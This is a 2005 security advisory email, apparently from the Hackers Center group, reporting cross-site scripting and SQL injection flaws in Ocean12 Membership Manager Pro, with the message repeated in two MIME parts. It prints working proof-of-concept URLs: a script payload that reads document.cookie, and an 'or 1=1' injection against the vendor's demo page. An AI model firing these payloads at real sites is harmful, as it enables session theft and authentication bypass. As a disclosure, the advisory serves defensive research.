Content-type: Multipart/Alternative; boundary="Alt-Boundary-17843.14003556"
--Alt-Boundary-17843.14003556
Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory
Title: Ocean12 Membership Manager Pro : XSS and Sql injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner
to easily add password protected areas to their website"
xss
http://www.ocean12scripts.com/products/membership/demo/main.asp?
UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s
cript%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
SQL INJECTION
http://www.ocean12scripts.com/products/membership/demo/main.asp?
UserID=0 or
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
The vendor has been contacted more than a month ago. No response
received.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp
zinho-no-spam @ hackerscenter.com
====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting
--Alt-Boundary-17843.14003556
Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory
Title: Ocean12 Membership Manager Pro : XSS and Sql injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner
to easily add password protected areas to their website"
xss
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
SQL INJECTION
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
The vendor has been contacted more than a month ago. No response
received.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp
zinho-no-spam @ hackerscenter.com
====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting
--Alt-Boundary-17843.14003556--